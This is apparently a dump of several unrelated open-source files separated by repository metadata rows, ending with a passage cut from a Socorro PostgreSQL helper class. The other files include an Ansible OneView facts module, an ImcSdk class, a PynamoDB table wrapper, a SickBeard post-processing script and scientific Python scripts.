- name: Gather facts about all Enclosure Groups
oneview_enclosure_group_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1600
delegate_to: localhost
- debug: var=enclosure_groups
- name: Gather paginated, filtered and sorted facts about Enclosure Groups
oneview_enclosure_group_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1600
params:
start: 0
count: 3
sort: 'name:descending'
filter: 'status=OK'
scope_uris: '/rest/scopes/cd237b60-09e2-45c4-829e-082e318a6d2a'
- debug: var=enclosure_groups
- name: Gather facts about an Enclosure Group by name with configuration script
oneview_enclosure_group_facts:
hostname: 172.16.101.48
username: administrator
password: my_password
api_version: 1600
name: "Test Enclosure Group Facts"
options:
- configuration_script
delegate_to: localhost
- debug: var=enclosure_groups
- debug: var=enclosure_group_script
'''
RETURN = '''
enclosure_groups:
description: Has all the OneView facts about the Enclosure Groups.
returned: Always, but can be null.
type: dict
enclosure_group_script:
description: The configuration script for an Enclosure Group.
returned: When requested, but can be null.
type: string
'''
from ansible.module_utils.oneview import OneViewModule
class EnclosureGroupFactsModule(OneViewModule):
argument_spec = dict(
name=dict(required=False, type='str'),
options=dict(required=False, type='list'),
params=dict(required=False, type='dict')
)
def __init__(self):
super(EnclosureGroupFactsModule, self).__init__(additional_arg_spec=self.argument_spec)
self.set_resource_object(self.oneview_client.enclosure_groups)
def execute_module(self):
facts = {}
enclosure_groups = []
name = self.module.params.get("name")
if name:
if self.current_resource:
enclosure_groups = self.current_resource.data
if "configuration_script" in self.options:
facts["enclosure_group_script"] = self.current_resource.get_script()
else:
enclosure_groups = self.resource_client.get_all(**self.facts_params)
facts["enclosure_groups"] = enclosure_groups
return dict(changed=False, ansible_facts=facts)
def main():
EnclosureGroupFactsModule().run()
if __name__ == '__main__':
main()
| apache-2.0 | 5,266,151,565,631,276,000 | 28.401408 | 95 | 0.677365 | false |
ragupta-git/ImcSdk | imcsdk/mometa/equipment/EquipmentSystemIOController.py | 1 | 2755 | """This module contains the general information for EquipmentSystemIOController ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class EquipmentSystemIOControllerConsts:
ADMIN_POWER_CMC_REBOOT = "cmc-reboot"
ADMIN_POWER_CMC_RESET_DEFAULT = "cmc-reset-default"
ADMIN_POWER_POLICY = "policy"
class EquipmentSystemIOController(ManagedObject):
"""This is EquipmentSystemIOController class."""
consts = EquipmentSystemIOControllerConsts()
naming_props = set([u'id'])
mo_meta = {
"modular": MoMeta("EquipmentSystemIOController", "equipmentSystemIOController", "slot-[id]", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "read-only", "user"], [u'equipmentChassis'], [u'commEpIpmiLan', u'equipmentSharedIOModule', u'mgmtController', u'siocResetReason'], ["Get", "Set"])
}
prop_meta = {
"modular": {
"admin_power": MoPropertyMeta("admin_power", "adminPower", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["cmc-reboot", "cmc-reset-default", "policy"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version2013e, MoPropertyMeta.NAMING, None, None, None, None, [], ["1-2"]),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
},
}
prop_map = {
"modular": {
"adminPower": "admin_power",
"childAction": "child_action",
"description": "description",
"dn": "dn",
"id": "id",
"rn": "rn",
"status": "status",
},
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.admin_power = None
self.child_action = None
self.description = None
self.status = None
ManagedObject.__init__(self, "EquipmentSystemIOController", parent_mo_or_dn, **kwargs)
| apache-2.0 | -862,146,203,412,341,400 | 43.435484 | 309 | 0.625408 | false |
aerosara/thesis | notebooks_archive_10112014/pycse Examples.py | 1 | 2176 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=3>
# Example from pycse 1
# <codecell>
# copied from http://kitchingroup.cheme.cmu.edu/blog/tag/events/
from pycse import odelay
import matplotlib.pyplot as plt
import numpy as np
def ode(Y,x):
y1, y2 = Y
dy1dx = y2
dy2dx = -y1
return [dy1dx, dy2dx]
def event1(Y, x):
y1, y2 = Y
value = y2 - (-1.0)
isterminal = True
direction = 0
return value, isterminal, direction
def event2(Y, x):
dy1dx, dy2dx = ode(Y,x)
value = dy1dx - 0.0
isterminal = False
direction = -1 # derivative is decreasing towards a maximum
return value, isterminal, direction
Y0 = [2.0, 1.0]
xspan = np.linspace(0, 5)
X, Y, XE, YE, IE = odelay(ode, Y0, xspan, events=[event1, event2])
plt.plot(X, Y)
for ie,xe,ye in zip(IE, XE, YE):
if ie == 1: #this is the second event
y1,y2 = ye
plt.plot(xe, y1, 'ro')
plt.legend(['$y_1$', '$y_2$'], loc='best')
#plt.savefig('images/odelay-mult-eq.png')
plt.show()
# <headingcell level=3>
# Example from pycse 2
# <codecell>
# copied from: http://kitchingroup.cheme.cmu.edu/pycse/pycse.html#sec-10-1-8
# 10.1.8 Stopping the integration of an ODE at some condition
from pycse import *
import numpy as np
k = 0.23
Ca0 = 2.3
def dCadt(Ca, t):
return -k * Ca**2
def stop(Ca, t):
isterminal = True
direction = 0
value = 1.0 - Ca
return value, isterminal, direction
tspan = np.linspace(0.0, 10.0)
t, CA, TE, YE, IE = odelay(dCadt, Ca0, tspan, events=[stop])
print 'At t = {0:1.2f} seconds the concentration of A is {1:1.2f} mol/L.'.format(t[-1], float(CA[-1]))
# <headingcell level=3>
# fsolve example
# <codecell>
from math import cos
def func(x):
return x + 2*cos(x) # finds where this is zero
def func2(x):
out = [x[0]*cos(x[1]) - 4]
out.append(x[1]*x[0] - x[1] - 5)
return out # finds where both elements of this array are zero
from scipy.optimize import fsolve
x0 = fsolve(func, 0.3) # initial guess
print x0
print func(x0)
#-1.02986652932
x02 = fsolve(func2, [1, 1]) # initial guesses
print x02
print func2(x02)
#[ 6.50409711 0.90841421]
| mit | 5,269,726,309,331,049,000 | 18.781818 | 102 | 0.628676 | false |
mtsgrd/PynamoDB2 | pynamodb/connection/table.py | 1 | 7391 | """
PynamoDB Connection classes
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from .base import Connection
class TableConnection(object):
"""
A higher level abstraction over botocore
"""
def __init__(self, table_name, region=None, host=None):
self._hash_keyname = None
self._range_keyname = None
self.table_name = table_name
self.connection = Connection(region=region, host=host)
def delete_item(self, hash_key,
range_key=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the DeleteItem operation and returns the result
"""
return self.connection.delete_item(
self.table_name,
hash_key,
range_key=range_key,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def update_item(self,
hash_key,
range_key=None,
attribute_updates=None,
expected=None,
return_consumed_capacity=None,
return_item_collection_metrics=None,
return_values=None
):
"""
Performs the UpdateItem operation
"""
return self.connection.update_item(
self.table_name,
hash_key,
range_key=range_key,
attribute_updates=attribute_updates,
expected=expected,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics,
return_values=return_values)
def put_item(self, hash_key,
range_key=None,
attributes=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the PutItem operation and returns the result
"""
return self.connection.put_item(
self.table_name,
hash_key,
range_key=range_key,
attributes=attributes,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_write_item(self,
put_items=None,
delete_items=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the batch_write_item operation
"""
return self.connection.batch_write_item(
self.table_name,
put_items=put_items,
delete_items=delete_items,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_get_item(self, keys, consistent_read=None, return_consumed_capacity=None, attributes_to_get=None):
"""
Performs the batch get item operation
"""
return self.connection.batch_get_item(
self.table_name,
keys,
consistent_read=consistent_read,
return_consumed_capacity=return_consumed_capacity,
attributes_to_get=attributes_to_get)
def get_item(self, hash_key, range_key=None, consistent_read=False, attributes_to_get=None):
"""
Performs the GetItem operation and returns the result
"""
return self.connection.get_item(
self.table_name,
hash_key,
range_key=range_key,
consistent_read=consistent_read,
attributes_to_get=attributes_to_get)
def scan(self,
attributes_to_get=None,
limit=None,
scan_filter=None,
return_consumed_capacity=None,
segment=None,
total_segments=None,
exclusive_start_key=None):
"""
Performs the scan operation
"""
return self.connection.scan(
self.table_name,
attributes_to_get=attributes_to_get,
limit=limit,
scan_filter=scan_filter,
return_consumed_capacity=return_consumed_capacity,
segment=segment,
total_segments=total_segments,
exclusive_start_key=exclusive_start_key)
def query(self,
hash_key,
attributes_to_get=None,
consistent_read=False,
exclusive_start_key=None,
index_name=None,
key_conditions=None,
limit=None,
return_consumed_capacity=None,
scan_index_forward=None,
select=None
):
"""
Performs the Query operation and returns the result
"""
return self.connection.query(
self.table_name,
hash_key,
attributes_to_get=attributes_to_get,
consistent_read=consistent_read,
exclusive_start_key=exclusive_start_key,
index_name=index_name,
key_conditions=key_conditions,
limit=limit,
return_consumed_capacity=return_consumed_capacity,
scan_index_forward=scan_index_forward,
select=select)
def describe_table(self):
"""
Performs the DescribeTable operation and returns the result
"""
return self.connection.describe_table(self.table_name)
def delete_table(self):
"""
Performs the DeleteTable operation and returns the result
"""
return self.connection.delete_table(self.table_name)
def update_table(self,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_index_updates=None):
"""
Performs the UpdateTable operation and returns the result
"""
return self.connection.update_table(
self.table_name,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_index_updates=global_secondary_index_updates)
def create_table(self,
attribute_definitions=None,
key_schema=None,
read_capacity_units=None,
write_capacity_units=None,
global_secondary_indexes=None,
local_secondary_indexes=None):
"""
Performs the CreateTable operation and returns the result
"""
return self.connection.create_table(
self.table_name,
attribute_definitions=attribute_definitions,
key_schema=key_schema,
read_capacity_units=read_capacity_units,
write_capacity_units=write_capacity_units,
global_secondary_indexes=global_secondary_indexes,
local_secondary_indexes=local_secondary_indexes
)
| mit | 4,248,419,250,073,645,600 | 34.533654 | 112 | 0.557705 | false |
BeegorMif/HTPC-Manager | autoProcessTV/mediaToSickbeard.py | 1 | 6654 | #!/usr/bin/env python2
import sys
import os
import time
import ConfigParser
import logging
sickbeardPath = os.path.split(os.path.split(sys.argv[0])[0])[0]
sys.path.append(os.path.join( sickbeardPath, 'lib'))
sys.path.append(sickbeardPath)
configFilename = os.path.join(sickbeardPath, "config.ini")
import requests
config = ConfigParser.ConfigParser()
try:
fp = open(configFilename, "r")
config.readfp(fp)
fp.close()
except IOError, e:
print "Could not find/read Sickbeard config.ini: " + str(e)
print 'Possibly wrong mediaToSickbeard.py location. Ensure the file is in the autoProcessTV subdir of your Sickbeard installation'
time.sleep(3)
sys.exit(1)
scriptlogger = logging.getLogger('mediaToSickbeard')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s MEDIATOSICKBEARD :: %(message)s', '%b-%d %H:%M:%S')
# Get the log dir setting from SB config
logdirsetting = config.get("General", "log_dir") if config.get("General", "log_dir") else 'Logs'
# put the log dir inside the SickBeard dir, unless an absolute path
logdir = os.path.normpath(os.path.join(sickbeardPath, logdirsetting))
logfile = os.path.join(logdir, 'sickbeard.log')
try:
handler = logging.FileHandler(logfile)
except:
print 'Unable to open/create the log file at ' + logfile
time.sleep(3)
sys.exit()
handler.setFormatter(formatter)
scriptlogger.addHandler(handler)
scriptlogger.setLevel(logging.DEBUG)
def utorrent():
# print 'Calling utorrent'
if len(sys.argv) < 2:
scriptlogger.error('No folder supplied - is this being called from uTorrent?')
print "No folder supplied - is this being called from uTorrent?"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
def transmission():
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
return (dirName, nzbName)
def deluge():
if len(sys.argv) < 4:
scriptlogger.error('No folder supplied - is this being called from Deluge?')
print "No folder supplied - is this being called from Deluge?"
time.sleep(3)
sys.exit()
dirName = sys.argv[3]
nzbName = sys.argv[2]
return (dirName, nzbName)
def blackhole():
if None != os.getenv('TR_TORRENT_DIR'):
scriptlogger.debug('Processing script triggered by Transmission')
print "Processing script triggered by Transmission"
scriptlogger.debug(u'TR_TORRENT_DIR: ' + os.getenv('TR_TORRENT_DIR'))
scriptlogger.debug(u'TR_TORRENT_NAME: ' + os.getenv('TR_TORRENT_NAME'))
dirName = os.getenv('TR_TORRENT_DIR')
nzbName = os.getenv('TR_TORRENT_NAME')
else:
if len(sys.argv) < 2:
scriptlogger.error('No folder supplied - Your client should invoke the script with a Dir and a Relese Name')
print "No folder supplied - Your client should invoke the script with a Dir and a Relese Name"
time.sleep(3)
sys.exit()
dirName = sys.argv[1]
nzbName = sys.argv[2]
return (dirName, nzbName)
#def hella():
# if len(sys.argv) < 4:
# scriptlogger.error('No folder supplied - is this being called from HellaVCR?')
# print "No folder supplied - is this being called from HellaVCR?"
# sys.exit()
# else:
# dirName = sys.argv[3]
# nzbName = sys.argv[2]
#
# return (dirName, nzbName)
def main():
scriptlogger.info(u'Starting external PostProcess script ' + __file__)
host = config.get("General", "web_host")
port = config.get("General", "web_port")
username = config.get("General", "web_username")
password = config.get("General", "web_password")
try:
ssl = int(config.get("General", "enable_https"))
except (ConfigParser.NoOptionError, ValueError):
ssl = 0
try:
web_root = config.get("General", "web_root")
except ConfigParser.NoOptionError:
web_root = ""
tv_dir = config.get("General", "tv_download_dir")
use_torrents = int(config.get("General", "use_torrents"))
torrent_method = config.get("General", "torrent_method")
if not use_torrents:
scriptlogger.error(u'Enable Use Torrent on Sickbeard to use this Script. Aborting!')
print u'Enable Use Torrent on Sickbeard to use this Script. Aborting!'
time.sleep(3)
sys.exit()
if not torrent_method in ['utorrent', 'transmission', 'deluge', 'blackhole']:
scriptlogger.error(u'Unknown Torrent Method. Aborting!')
print u'Unknown Torrent Method. Aborting!'
time.sleep(3)
sys.exit()
dirName, nzbName = eval(locals()['torrent_method'])()
if dirName is None:
scriptlogger.error(u'MediaToSickbeard script need a dir to be run. Aborting!')
print u'MediaToSickbeard script need a dir to be run. Aborting!'
time.sleep(3)
sys.exit()
if not os.path.isdir(dirName):
scriptlogger.error(u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.')
print u'Folder ' + dirName + ' does not exist. Aborting AutoPostProcess.'
time.sleep(3)
sys.exit()
if nzbName and os.path.isdir(os.path.join(dirName, nzbName)):
dirName = os.path.join(dirName, nzbName)
params = {}
params['quiet'] = 1
params['dir'] = dirName
if nzbName != None:
params['nzbName'] = nzbName
if ssl:
protocol = "https://"
else:
protocol = "http://"
if host == '0.0.0.0':
host = 'localhost'
url = protocol + host + ":" + port + web_root + "/home/postprocess/processEpisode"
scriptlogger.debug("Opening URL: " + url + ' with params=' + str(params))
print "Opening URL: " + url + ' with params=' + str(params)
try:
response = requests.get(url, auth=(username, password), params=params, verify=False)
except Exception, e:
scriptlogger.error(u': Unknown exception raised when opening url: ' + str(e))
time.sleep(3)
sys.exit()
if response.status_code == 401:
scriptlogger.error(u'Invalid Sickbeard Username or Password, check your config')
print 'Invalid Sickbeard Username or Password, check your config'
time.sleep(3)
sys.exit()
if response.status_code == 200:
scriptlogger.info(u'Script ' + __file__ + ' Succesfull')
print 'Script ' + __file__ + ' Succesfull'
time.sleep(3)
sys.exit()
if __name__ == '__main__':
main()
| gpl-3.0 | 1,972,086,942,503,040,300 | 31.617647 | 134 | 0.628194 | false |
victorpoughon/master-thesis | python/outlier_analysis.py | 1 | 1365 | #!/usr/bin/env python3
import os
import os.path
import sys
import numpy as np
import matplotlib.pyplot as plt
from features_common import match_angle, base_plot
def outlier_frequency_plot(path, angles, threshold):
f, ax = base_plot()
ax.plot(100 * np.cumsum(np.abs(angles) > threshold) / angles.size)
ax.set_xlabel("Match number")
ax.set_ylabel("Outlier fraction (%)")
ax.set_ylim([0, 100])
f.savefig(path, bbox_inches='tight')
plt.close(f)
if __name__ == "__main__":
if len(sys.argv) < 2:
path = "."
else:
path = sys.argv[1]
# Produce outlier plots for all directories containing outlier_threshold.txt
for root, subdirs, files in os.walk(path):
if "matches.txt" in files:
shape = np.loadtxt(os.path.join(root, "shape.txt"))
matches = np.loadtxt(os.path.join(root, "matches.txt"), comments="#")
threshold = np.loadtxt(os.path.join(root, "outlier_threshold.txt"))
if threshold.size == 1:
print("outlier_analysis.py: " + root)
# Compute matches angles
angles = match_angle(matches, shape)
outlier_frequency_plot(os.path.join(root, "plot_outliers.pdf"), angles, threshold)
else:
print("outlier_analysis.py: " + root + " --- empty outlier_threshold.txt")
| mit | 2,286,111,514,915,068,000 | 34 | 98 | 0.605861 | false |
dcf21/4most-4gp-scripts | src/scripts/synthesize_samples/synthesize_galah_with_microturbulence.py | 1 | 4084 | #!../../../../virtualenv/bin/python3
# -*- coding: utf-8 -*-
# NB: The shebang line above assumes you've installed a python virtual environment alongside your working copy of the
# <4most-4gp-scripts> git repository. It also only works if you invoke this python script from the directory where it
# is located. If these two assumptions are incorrect (e.g. you're using Conda), you can still use this script by typing
# <python synthesize_galah.py>, but <./synthesize_galah.py> will not work.
"""
Take parameters of GALAH sample of stars emailed by Karin on 30 Oct 2017, and synthesize spectra using
TurboSpectrum.
"""
import logging
import numpy as np
from astropy.io import fits
from lib.base_synthesizer import Synthesizer
# List of elements whose abundances we pass to TurboSpectrum
element_list = (
'Al', 'Ba', 'C', 'Ca', 'Ce', 'Co', 'Cr', 'Cu', 'Eu', 'K', 'La', 'Li', 'Mg', 'Mn', 'Mo', 'Na', 'Nd', 'Ni', 'O',
'Rb', 'Ru', 'Sc', 'Si', 'Sm', 'Sr', 'Ti', 'V', 'Y', 'Zn', 'Zr'
)
# Start logging our progress
logging.basicConfig(level=logging.INFO, format='[%(asctime)s] %(levelname)s:%(filename)s:%(message)s',
datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
logger.info("Synthesizing GALAH sample spectra, with microturbulence")
# Instantiate base synthesizer
synthesizer = Synthesizer(library_name="galah_sample_v2",
logger=logger,
docstring=__doc__)
# Table supplies list of abundances for GES stars
f = fits.open("../../../../downloads/GALAH_trainingset_4MOST_errors.fits")
galah_stars = f[1].data
galah_fields = galah_stars.names
# Loop over stars extracting stellar parameters from FITS file
star_list = []
for star_index in range(len(galah_stars)):
fe_abundance = float(galah_stars.Feh_sme[star_index])
star_list_item = {
"name": "star_{:08d}".format(star_index),
"Teff": float(galah_stars.Teff_sme[star_index]),
"[Fe/H]": fe_abundance,
"logg": float(galah_stars.Logg_sme[star_index]),
"extra_metadata": {},
"free_abundances": {},
"input_data": {}
}
# Work out micro-turbulent velocity
if (star_list_item['logg'] >= 4.2) and (star_list_item['Teff'] <= 5500):
star_list_item['microturbulence'] = \
1.1 + 1e-4 * (star_list_item['Teff'] - 5500) + 4e-7 * (star_list_item['Teff'] - 5500) ** 2
else:
star_list_item['microturbulence'] = \
1.1 + 1.6e-4 * (star_list_item['Teff'] - 5500)
# Pass list of the abundances of individual elements to TurboSpectrum
free_abundances = star_list_item["free_abundances"]
metadata = star_list_item["extra_metadata"]
for element in element_list:
if (not synthesizer.args.elements) or (element in synthesizer.args.elements.split(",")):
fits_field_name = "{}_abund_sme".format(element)
# Abundance is specified as [X/Fe]. Convert to [X/H]
abundance = galah_stars[fits_field_name][star_index] + fe_abundance
if np.isfinite(abundance):
free_abundances[element] = float(abundance)
metadata["flag_{}".format(element)] = float(
galah_stars["flag_{}_abund_sme".format(element)][star_index])
# Propagate all input fields from the FITS file into <input_data>
input_data = star_list_item["input_data"]
for col_name in galah_fields:
value = galah_stars[col_name][star_index]
if galah_stars.dtype[col_name].type is np.string_:
typed_value = str(value)
else:
typed_value = float(value)
input_data[col_name] = typed_value
star_list.append(star_list_item)
# Pass list of stars to synthesizer
synthesizer.set_star_list(star_list)
# Output data into sqlite3 db
synthesizer.dump_stellar_parameters_to_sqlite()
# Create new SpectrumLibrary
synthesizer.create_spectrum_library()
# Iterate over the spectra we're supposed to be synthesizing
synthesizer.do_synthesis()
# Close TurboSpectrum synthesizer instance
synthesizer.clean_up()
| mit | 1,813,588,961,459,979,500 | 37.168224 | 119 | 0.643732 | false |
SamHames/scikit-image | skimage/viewer/canvastools/base.py | 1 | 5472 | import numpy as np
try:
from matplotlib import lines
except ImportError:
pass
__all__ = ['CanvasToolBase', 'ToolHandles']
def _pass(*args):
pass
class CanvasToolBase(object):
"""Base canvas tool for matplotlib axes.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool is displayed.
on_move : function
Function called whenever a control handle is moved.
This function must accept the end points of line as the only argument.
on_release : function
Function called whenever the control handle is released.
on_enter : function
Function called whenever the "enter" key is pressed.
useblit : bool
If True, update canvas by blitting, which is much faster than normal
redrawing (turn off for debugging purposes).
"""
def __init__(self, ax, on_move=None, on_enter=None, on_release=None,
useblit=True):
self.ax = ax
self.canvas = ax.figure.canvas
self.img_background = None
self.cids = []
self._artists = []
self.active = True
if useblit:
self.connect_event('draw_event', self._blit_on_draw_event)
self.useblit = useblit
self.callback_on_move = _pass if on_move is None else on_move
self.callback_on_enter = _pass if on_enter is None else on_enter
self.callback_on_release = _pass if on_release is None else on_release
self.connect_event('key_press_event', self._on_key_press)
def connect_event(self, event, callback):
"""Connect callback with an event.
This should be used in lieu of `figure.canvas.mpl_connect` since this
function stores call back ids for later clean up.
"""
cid = self.canvas.mpl_connect(event, callback)
self.cids.append(cid)
def disconnect_events(self):
"""Disconnect all events created by this widget."""
for c in self.cids:
self.canvas.mpl_disconnect(c)
def ignore(self, event):
"""Return True if event should be ignored.
This method (or a version of it) should be called at the beginning
of any event callback.
"""
return not self.active
def set_visible(self, val):
for artist in self._artists:
artist.set_visible(val)
def _blit_on_draw_event(self, event=None):
self.img_background = self.canvas.copy_from_bbox(self.ax.bbox)
self._draw_artists()
def _draw_artists(self):
for artist in self._artists:
self.ax.draw_artist(artist)
def remove(self):
"""Remove artists and events from axes.
Note that the naming here mimics the interface of Matplotlib artists.
"""
#TODO: For some reason, RectangleTool doesn't get properly removed
self.disconnect_events()
for a in self._artists:
a.remove()
def redraw(self):
"""Redraw image and canvas artists.
This method should be called by subclasses when artists are updated.
"""
if self.useblit and self.img_background is not None:
self.canvas.restore_region(self.img_background)
self._draw_artists()
self.canvas.blit(self.ax.bbox)
else:
self.canvas.draw_idle()
def _on_key_press(self, event):
if event.key == 'enter':
self.callback_on_enter(self.geometry)
self.set_visible(False)
self.redraw()
@property
def geometry(self):
"""Geometry information that gets passed to callback functions."""
return None
class ToolHandles(object):
"""Control handles for canvas tools.
Parameters
----------
ax : :class:`matplotlib.axes.Axes`
Matplotlib axes where tool handles are displayed.
x, y : 1D arrays
Coordinates of control handles.
marker : str
Shape of marker used to display handle. See `matplotlib.pyplot.plot`.
marker_props : dict
Additional marker properties. See :class:`matplotlib.lines.Line2D`.
"""
def __init__(self, ax, x, y, marker='o', marker_props=None):
self.ax = ax
props = dict(marker=marker, markersize=7, mfc='w', ls='none',
alpha=0.5, visible=False)
props.update(marker_props if marker_props is not None else {})
self._markers = lines.Line2D(x, y, animated=True, **props)
self.ax.add_line(self._markers)
self.artist = self._markers
@property
def x(self):
return self._markers.get_xdata()
@property
def y(self):
return self._markers.get_ydata()
def set_data(self, pts, y=None):
"""Set x and y positions of handles"""
if y is not None:
x = pts
pts = np.array([x, y])
self._markers.set_data(pts)
def set_visible(self, val):
self._markers.set_visible(val)
def set_animated(self, val):
self._markers.set_animated(val)
def draw(self):
self.ax.draw_artist(self._markers)
def closest(self, x, y):
"""Return index and pixel distance to closest index."""
pts = np.transpose((self.x, self.y))
# Transform data coordinates to pixel coordinates.
pts = self.ax.transData.transform(pts)
diff = pts - ((x, y))
dist = np.sqrt(np.sum(diff**2, axis=1))
return np.argmin(dist), np.min(dist)
| bsd-3-clause | -8,322,848,763,189,975,000 | 30.448276 | 78 | 0.606725 | false |
rhelmer/socorro-lib | socorro/external/postgresql/base.py | 1 | 15947 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""Deprecated by socorro/external/postgresql/service_base.py"""
import contextlib
import logging
import psycopg2
import socorro.database.database as db
from socorro.external import DatabaseError
from .dbapi2_util import execute_query_fetchall, single_value_sql
logger = logging.getLogger("webapi")
def add_param_to_dict(dictionary, key, value):
"""
Dispatch a list of parameters into a dictionary.
"""
for i, elem in enumerate(value):
dictionary[key + str(i)] = elem
return dictionary
class PostgreSQLBase(object):
"""
Base class for PostgreSQL based service implementations.
"""
def __init__(self, *args, **kwargs):
"""
Store the config and create a connection to the database.
Keyword arguments:
config -- Configuration of the application.
"""
self.context = kwargs.get("config")
if hasattr(self.context, 'database'):
# XXX this should be replaced with connection_context instead
self.context.database['database_host'] = \
self.context.database.database_hostname
self.context.database['database_port'] = \
self.context.database.database_port
self.context.database['database_name'] = \
self.context.database.database_name
self.context.database['database_username'] = \
self.context.database.database_username
self.context.database['database_password'] = \
self.context.database.database_password
self.database = db.Database(self.context.database)
else:
# the old middleware
self.database = db.Database(self.context)
@contextlib.contextmanager
def get_connection(self):
connection = self.database.connection()
try:
yield connection
finally:
connection.close()
def query(self, sql, params=None, error_message=None, connection=None):
"""Return the result of a query executed against PostgreSQL.
Create a connection, open a cursor, execute the query and return the
results. If an error occures, log it and raise a DatabaseError.
Keyword arguments:
sql -- SQL query to execute.
params -- Parameters to merge into the SQL query when executed.
error_message -- Eventual error message to log.
connection -- Optional connection to the database. If none, a new one
will be opened.
"""
fresh_connection = False
try:
if not connection:
connection = self.database.connection()
fresh_connection = True
# self.context.logger.debug(connection.cursor.mogrify(sql, params))
results = execute_query_fetchall(connection, sql, params)
except psycopg2.Error, e:
if error_message is None:
error_message = "Failed to execute query against PostgreSQL"
error_message = "%s - %s" % (error_message, str(e))
logger.error(error_message, exc_info=True)
raise DatabaseError(error_message)
finally:
if connection and fresh_connection:
connection.close()
return results
def count(self, sql, params=None, error_message=None, connection=None):
"""Return the result of a count SQL query executed against PostgreSQL.
Create a connection, open a cursor, execute the query and return the
result. If an error occures, log it and raise a DatabaseError.
Keyword arguments:
sql -- SQL query to execute.
params -- Parameters to merge into the SQL query when executed.
error_message -- Eventual error message to log.
connection -- Optional connection to the database. If none, a new one
will be opened.
"""
fresh_connection = False
try:
if not connection:
connection = self.database.connection()
fresh_connection = True
# self.context.logger.debug(connection.cursor.mogrify(sql, params))
result = single_value_sql(connection, sql, params)
except psycopg2.Error, e:
if error_message is None:
error_message = "Failed to execute count against PostgreSQL"
error_message = "%s - %s" % (error_message, str(e))
logger.error(error_message, exc_info=True)
raise DatabaseError(error_message)
finally:
if connection and fresh_connection:
connection.close()
return result
@staticmethod
def parse_versions(versions_list, products):
"""
Parses the versions, separating by ":" and returning versions
and products.
"""
versions = []
for v in versions_list:
if v.find(":") > -1:
pv = v.split(":")
versions.append(pv[0])
versions.append(pv[1])
else:
products.append(v)
return (versions, products)
@staticmethod
def prepare_terms(terms, search_mode):
"""
Prepare terms for search, adding '%' where needed,
given the search mode.
"""
if search_mode in ("contains", "starts_with"):
terms = terms.replace("_", "\_").replace("%", "\%")
if search_mode == "contains":
terms = "%" + terms + "%"
elif search_mode == "starts_with":
terms = terms + "%"
return terms
@staticmethod
def dispatch_params(sql_params, key, value):
"""
Dispatch a parameter or a list of parameters into the params array.
"""
if not isinstance(value, list):
sql_params[key] = value
else:
for i, elem in enumerate(value):
sql_params[key + str(i)] = elem
return sql_params
@staticmethod
def build_reports_sql_from(params):
"""
Generate and return the FROM part of the final SQL query.
"""
sql_from = ["FROM reports r"]
## Searching through plugins
if params["report_process"] == "plugin":
sql_from.append(("plugins_reports ON "
"plugins_reports.report_id = r.id"))
sql_from.append(("plugins ON "
"plugins_reports.plugin_id = plugins.id"))
sql_from = " JOIN ".join(sql_from)
return sql_from
@staticmethod
def build_reports_sql_where(params, sql_params, config):
"""Return a string containing the WHERE part of a search-related SQL
query.
"""
if hasattr(config, "webapi"):
config = config.webapi
sql_where = ["""
WHERE r.date_processed BETWEEN %(from_date)s AND %(to_date)s
"""]
sql_params["from_date"] = params["from_date"]
sql_params["to_date"] = params["to_date"]
## Adding terms to where clause
if params["terms"]:
if params["search_mode"] == "is_exactly":
sql_where.append("r.signature=%(term)s")
else:
sql_where.append("r.signature LIKE %(term)s")
sql_params["term"] = params["terms"]
## Adding products to where clause
if params["products"]:
products_list = ["r.product=%(product" + str(x) + ")s"
for x in range(len(params["products"]))]
sql_where.append("(%s)" % (" OR ".join(products_list)))
sql_params = add_param_to_dict(sql_params, "product",
params["products"])
## Adding OS to where clause
if params["os"]:
os_list = ["r.os_name=%(os" + str(x) + ")s"
for x in range(len(params["os"]))]
sql_where.append("(%s)" % (" OR ".join(os_list)))
